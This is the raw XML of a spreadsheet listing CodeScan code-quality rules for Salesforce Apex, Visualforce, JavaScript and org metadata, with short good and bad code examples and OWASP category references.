&lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/\n\nfunction thing()&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/{\n    return 'test';\n}\n\nfunction thing(&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/){\n    return 'test';\n}\n\nfunction thing&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/(){\n    return 'test';\n}\n\nfunction thing᠎/*&amp;lt;MVS&amp;gt;*/(){\n    return 'test';\n}\n\nfunction thing() {\n    return 'test'; /*&amp;lt;ENSP&amp;gt;*/\n}\n\nfunction thing() {\n    return 'test';&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/\n}\n\nfunction thing() {\n    // Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text\n}\n\n/*\nDescription&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text\n*/\n\nfunction thing() {\n    return /&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;regexp/;\n}\n\n/*eslint-env es6*/\nfunction thing() {\n    return `template &amp;lt;NBSP&amp;gt;string`;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/\n\nfunction thing() {\n    return '&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;thing';\n}\n\nfunction thing() {\n    return '​&amp;lt;ZWSP&amp;gt;thing';\n}\n\nfunction thing() {\n    return 'th&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;ing';\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skipcomments"&gt;skipComments&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipComments": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipComments": true }]*/\n\nfunction thing() {\n    // Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text\n}\n\n/*\nDescription&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text\n*/\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skipregexps"&gt;skipRegExps&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipRegExps": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipRegExps": true }]*/\n\nfunction thing() {\n    return /&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;regexp/;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skiptemplates"&gt;skipTemplates&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipTemplates": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipTemplates": true }]*/\n/*eslint-env es6*/\n\nfunction thing() {\n    return `template &amp;lt;NBSP&amp;gt;string`;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you decide that you wish to use whitespace other than tabs and spaces outside of strings in your application.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;[ECMA whitespace](https://es5.github.io/#x7.2 \xA0)&lt;/li&gt;\n&lt;li&gt;&lt;a href="http://timelessrepo.com/json-isnt-a-javascript-subset"&gt;JSON whitespace issues&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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An issue is created on a file as soon as the branch coverage on this file is less than the required threshold. It gives the number of branches to be covered in order to reach the required threshold.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Some For loops can be simplified to While loops, this makes them more concise.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	void bar() {
		for (;true;) true;		//Bad: The for loop contains no Initialiser or Update.
			while(true){		//Good: Use while loop instead.
			}   			
	}
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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2017 Category A8 - Insecure Deserialization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</si>
  <si>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Avoid 'if' statements where a condition is checked but nothing is done about it.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 void bar(Integer x) {
  if (x == 0) {
  					//Bad: Nothing is done here.
  }
 }
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Determines whether the dimensions of comments found are within the specified limits.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/*
*
*	comment.  		//Bad: Too many lines.
*
*
*
*
*
*
*
*
*
*/
/*
*  	comment.		//Good: Can be shortened.
*/
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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Calling super in a constructor multiple times can be confusing. Try to use a single constructor
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar{
  public Foo(boolean p) {
   if ( p )
   	super('true value');
   else
   	super('false value'); //Bad: This can be confusing.
  }
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2017 Category A3 - Sensitive Data Exposure&lt;/li&gt;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</si>
  <si>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</si>
  <si>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Error messages that are passed to the client should use custom labels. This allows the message to be translated and modified more easily
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void triggerHandler(){
    	obj.addError('An error occurred', true); //Bad: hard coded error
    	throw new AuraHandledException(System.Label.Label_name + bad); //Bad: hard coded error
    	obj.addError(System.label.errorOccurred); //Good: Custom label
    }
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Useless parentheses should be removed.&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   private Integer _bar1;
   private Integer _bar2;
   public void setBar(Integer n) {
      _bar1 = Integer.valueOf((n)); //Bad: parentheses around n should be removed here...
      _bar2 = (n); 					// ...and here
   }
}
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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2017 Category A2 - Broken Authentication&lt;/li&gt;
	&lt;li&gt;OWASP Top 10 2017 Category A3 - Sensitive Data Exposure&lt;/li&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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The use of UserInfo.GetSessionId() is security-sensitive. Ensure that you need to do this.
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2017 Category A2 - Broken Authentication and Session Management&lt;/li&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identifies a possible unsafe usage of a static field.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class StaticField {
   static Integer x;
   public FinalFields(Integer y) {
    x = y; 		//Bad: This is unsafe. x is assigned to an unknown parameter.
   }
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Detects when a local variable is declared and/or assigned, but not used.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void doSomething() {
		Integer i = 5; //Bad: this variable is unused.
	}
}
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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If a final field is assigned to a compile-time constant it could be made static, thus saving overhead 
in each object at runtime.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public final Integer BAR = 42; //Bad: BAR could be static to save some memory.
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Classes containing only test methods should be annotated with @isTest
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class CarTest {						//Bad: needs to be annotated with @isTest
	public static testmethod void testX(){}
	public static testmethod void testY(){}
   // code
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2017 Category A1 - Injection &lt;/li&gt;
	  &lt;li&gt; OWASP Top 10 2017 Category A3 - Sensitive Data Exposure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</si>
  <si>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</si>
  <si>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</si>
  <si>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System.assertEquals(3, result); 				//Good: result is checked with an assertion.
   }
}
@IsTest
public class Foo  {
   public static testmethod void testSomething() {
   	  Integer result = 3 + 4;						//Bad: result is not checked.
   }
}
        &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Non-constructor methods should not have the same name as the enclosing class.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass {
	public MyClass() {}			//Good: this is OK because it is a constructor.
	public void MyClass() {}	//Bad: this is a method.
}
       &lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Abstract classes should be named 'AbstractXXX'.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public abstract class Foo {  //Bad: this should be 'AbstractFoo'.
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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A rule for the politically correct... we don't want to offend anyone.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/*      
*OMG, this is horrible, Bob is an idiot !!!   		//Bad: That's not very nice!
*/     
/*      
*This could be better. Bob, take note.   			//Good: Preferred.
*/     
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Classes with short names are not recommended.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {  //Bad: this is not recommended.
}
        &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Method names that are very short are not helpful to the reader.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class ShortMethod {
	public void a( Integer i ) { //Bad: The method name should be more descriptive.
	}
}
     &lt;/pre&gt;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</si>
  <si>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</si>
  <si>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Avoid empty finally blocks. They serve no purpose and should be removed.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 public void bar() {
  try {
    Integer x=2;
   } finally {
    			//Bad: Nothing is done here.
   }
 }
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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Avoid using Test.isRunningTest(), using this can hide problems that occur during testing.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass  {
  public static void myFunction() {
    if ( !Test.isRunningTest ){      //Bad: This is not recommended.
	  //don't run during tests.
	}
  }
}
		&lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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2017 Category A3 - Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; [OWASP Top 10 2017 Category A6 - Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</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</si>
  <si>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</si>
  <si>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2017 Category A3 - Sensitive Data Exposure&lt;/li&gt;
&lt;/ul&gt;
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Foo{
    public void testA () {
        System.debug('Entering test');   //Bad: Consider removing this.
    }
}
     &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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A local variable assigned only can be declared final once.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Bar {
	public void foo () {
		String a = 'a'; 		//Bad: if a will not be assigned again it is better to make it final.
		final String b = 'b';	//Good: this is preferred.
	}
}
      &lt;/pre&gt;</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</si>
  <si>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2017 Category A1 -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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2017 Category A1 - Injection &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2017 Category A7 - Cross-Site Scripting (XSS)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Avoid empty try blocks.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 public void bar() {
  try {						//Bad: Nothing is done here.
  } catch (Exception e) {
    e.printStackTrace();
  }
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Avoid calling toString() on objects already known to be string instances; this is unnecessary.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
private String baz() {
    String bar = 'howdy';
    return bar.toString();   //Bad: this is not recommended;
}
    &lt;/pre&gt;</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</si>
  <si>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2017 Category A2 - Broken Authentication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</si>
  <si>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</si>
  <si>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Avoid the use of unnecessary return statements.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar() {
    Integer x = 42;
    return;			//Bad: avoid this.
  }
}
      &lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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An empty static initializer serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	static {		//Bad: This should be removed.
	// empty
	}
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2017 Category A6 -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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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A6 -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</si>
  <si>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Denotes whether comments are required (or unwanted) for specific language elements.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/**
* 
*
* @author George Bush
*/
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Catch blocks that merely rethrow a caught exception only add to code size and runtime complexity.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;  
public void bar() {
    try {
    // do something
    }  catch (SomeException se) {
       throw se;					//Bad: this is not recommended.
    }
}
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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There is no good reason to declare a field "public" and "static" without also declaring it "final". 
      Most of the time this is a kludge to share a state among several objects. But with this approach, 
      any object can do whatever it wants with the shared state, such as setting it to null.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class PrimitiveType {
  public static integer sharedStateVariable;				//Bad: Not recommended.
  public static final integer aStaticFinalVariable = 123;	//Good: Preferred.
}
    &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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Empty block statements serve no purpose and should be removed.
	&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   private Integer _bar;
   public void setBar(Integer bar) {
      { _bar = bar; } 		//This is ok.
      {} 					//Bad: This should be removed.
   }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Avoid the creation of unnecessary local variables.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   public Integer foo() {
     Integer x = doSomething();
     return x;  				//Bad: Instead, just 'return doSomething();'.
   }
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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Tests for null should not use the equals() method. The '==' operator should be used instead.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
String x = 'foo';
if (x.equals(null)) { //Bad: Not recommended.
   	doSomething();
	}
if (x == null) { 	//Good: This is preferred.
	}
        &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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Reassigning values to incoming parameters is not recommended.  Use temporary local variables instead.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  private void foo(String bar) {
    bar = 'something else';			//Bad: Not recommended.
  }
}
    &lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Avoid 'switch' statements where a label is defined but nothing is in it
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
    trigger leadDuplicatePreventer on Lead (before insert,before update) {
	  switch on triggerEvent {
	      when AFTER_INSERT {
	      	//BAD: this should not be empty
	      }
	  }
	}
 }
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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An exception occurred while parsing this file. Please send a description of this problem to support@code-scan.com.&lt;BR&gt;
&lt;BR&gt;
WARNING: No violation can be detected on this file due this error.</t>
  </si>
  <si>
    <t>Method names should always begin with a lower case character, and should not contain underscores.
          &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void fooStuff() {  //Good: camel-case is preferred.
	}
	public void Foo_Bar(){    //Bad: not recommended.
	}
}
          &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Avoid instances where a while statement does nothing.  
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
void bar(Integer a, Integer b) {
	while (a == b) {
						//Bad: Nothing is done here.
	}
}
       &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Unit tests should include Test.startTest() and Test.stopTest()
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@IsTest
public class Foo  {
   public static testmethod void testSomething() {
      Bar b = findBar();
      Test.startTest();
	  // System.assert(b.isX());
	  b.work();
      Test.stopTest();
   }
}
        &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Sometimes expressions are wrapped in unnecessary parentheses, making them look like function calls.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   boolean bar() {
      return (true);
      }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Empty initializers serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   static {} //Bad: This serves no purpose...
   {} 		//and neither does this.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Avoid creating multiple triggers on the same object
&lt;pre&gt;
trigger AccountTriggerInsert on Account (before insert) {	//Bad: Multiple triggers on the same object should be avoided.
}
trigger AccountTriggerUpdate on Account (before update) {
}
&lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Statements should be on separate lines to increase readability and maintainability.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void foo(Integer i){
    statement(); i++;   //Bad: Statements should be on separate lines.
  }
}
      &lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Empty switch statements serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
    Integer x = 2;
    switch on x {
        // once there was code here
        // but it's been commented out or something
    }
}
       &lt;/pre&gt;</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</si>
  <si>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2017 Category A2 -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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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common-sfmeta:FailedUnitTests</t>
  </si>
  <si>
    <t>Limit number of System Administrators</t>
  </si>
  <si>
    <t>sfmeta:CheckSystemAdministrator</t>
  </si>
  <si>
    <t>This rules checks the number of System Administrators for a Salesforce org.</t>
  </si>
  <si>
    <t>Suggested Solution</t>
  </si>
  <si>
    <t>Leverage the delegate admin profile option or make custom profiles for these users and make sure they can only access the data that is absolutely essential.</t>
  </si>
  <si>
    <t>Limit number of Custom Profiles with Modify All Data Permission</t>
  </si>
  <si>
    <t>sfmeta:CustomProfilesPermission</t>
  </si>
  <si>
    <t>Custom profiles with “Modify All Data” permissions can be extremely risky and can open the door to user-inflicted data loss and corruption. Limit the number of custom profiles with “Modify All Data” permissions. Best practice is to have no custom profiles that can modify all of your Salesforce data.</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientBranchCoverage</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientLineCoverage</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientCommentDensity</t>
  </si>
  <si>
    <t>common-sfmeta:DuplicatedBlocks</t>
  </si>
  <si>
    <t>common-sfmeta:SkippedUnitTests</t>
  </si>
  <si>
    <t>CodeScan provides a very handy method for creating new rules by writing an XPath query. When the XPath query finds a match, a violation is created. Let's take a simple example : assume we only want a single form on each metadata fle. See our Custom Rules tutorial for more information.</t>
  </si>
  <si>
    <t>sfmeta:XPathRule</t>
  </si>
  <si>
    <t>sfmeta:ExcessivePageLayout</t>
  </si>
  <si>
    <t>Limit number of page layouts per object</t>
  </si>
  <si>
    <t>As the number of page layouts per object increases, the performance of Salesforce org decreases. The rule is intended to restrict the maximum number of page layouts that can be accommodated under a single object.</t>
  </si>
  <si>
    <t>sfmeta:LimitCustomFields</t>
  </si>
  <si>
    <t>Limit number of Custom Fields per object</t>
  </si>
  <si>
    <t>This rule limits the number of custom fields set for a salesforce object. The rule also allows users to specify object specific custom field limits.</t>
  </si>
  <si>
    <t>sf:LongMethodName</t>
  </si>
  <si>
    <t>Long Method Name</t>
  </si>
  <si>
    <t>Method names that are too long can make the code difficult to follow.</t>
  </si>
  <si>
    <t>CodeScan: 22.1</t>
  </si>
  <si>
    <t>SonarJS:  6.2</t>
  </si>
  <si>
    <t>sf:LongClassName</t>
  </si>
  <si>
    <t>Long Class Name</t>
  </si>
  <si>
    <t>Class names that are too long can make the code difficult to follow. 
Salesforce Developer Console restricts usersfrom creating an Apex Class with class name greater than 40 characters.</t>
  </si>
  <si>
    <t>sf:LongTriggerName</t>
  </si>
  <si>
    <t>Long Trigger Name</t>
  </si>
  <si>
    <t>Trigger names that are too long can make the code difficult to follow.</t>
  </si>
  <si>
    <t>sfmeta:ExcessiveWorkflowsOrgWide</t>
  </si>
  <si>
    <t>Excessive Work flows Org Wide</t>
  </si>
  <si>
    <t>This is a complete list of Apex, Visualforce , Javascript and Salesforce Metadata rules used by CodeScan as of Jan 2022</t>
  </si>
  <si>
    <t>Apex-237</t>
  </si>
  <si>
    <t>VF &amp; Lightening- 89</t>
  </si>
  <si>
    <t>javascript (CS)- 48</t>
  </si>
  <si>
    <t>javascript (Sonar)- 122</t>
  </si>
  <si>
    <t>security hotspots (apex)- 5</t>
  </si>
  <si>
    <t>security hotspots (vf and l)- 1</t>
  </si>
  <si>
    <t>salesforce metadata- 18</t>
  </si>
  <si>
    <t>This rule helps to limit the number of workflow rules in your salesforce org. This ensures that the workflow rules will not be overloading the system by doing extensive calculations whenever a record is created or updated.
As per the Salesforce documentation, the limit for workflow rules per org is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</si>
</sst>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s>
  <fills count="4">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xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="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3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2"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zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="L10" sqref="L10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="27" customWidth="1"/>
    <col min="2" max="2" width="6.5703125" customWidth="1"/>
    <col min="3" max="3" width="32.85546875" customWidth="1"/>
    <col min="4" max="1025" width="8.5703125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="18" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="19" t="s">
        <v>1495</v>
      </c>
      <c r="B1" s="19"/>
      <c r="C1" s="19"/>
      <c r="D1" s="19"/>
      <c r="E1" s="19"/>
      <c r="F1" s="19"/>
      <c r="G1" s="19"/>
      <c r="H1" s="19"/>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2" s="5"/>
      <c r="B2" s="6"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B3" s="6"/>
      <c r="C3" s="6"/>
      <c r="D3" s="6"/>
      <c r="E3" s="6"/>
      <c r="F3" s="6"/>
      <c r="G3" s="6"/>
      <c r="H3" s="6"/>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4" s="6" t="s">
        <v>1485</v>
      </c>
      <c r="B4" s="6"/>
      <c r="C4" s="6"/>
      <c r="D4" s="6"/>
      <c r="E4" s="6"/>
      <c r="F4" s="6"/>
      <c r="G4" s="6"/>
      <c r="H4" s="6"/>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="6" t="s">
        <v>1486</v>
      </c>
      <c r="B5" s="6"/>
      <c r="C5" s="6"/>
      <c r="D5" s="6"/>
      <c r="E5" s="6"/>
      <c r="F5" s="6"/>
      <c r="G5" s="6"/>
      <c r="H5" s="6"/>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="6"/>
      <c r="B6" s="6"/>
      <c r="C6" s="6"/>
      <c r="D6" s="6"/>
      <c r="E6" s="6"/>
      <c r="F6" s="6"/>
      <c r="G6" s="6"/>
      <c r="H6" s="6"/>
    </row>
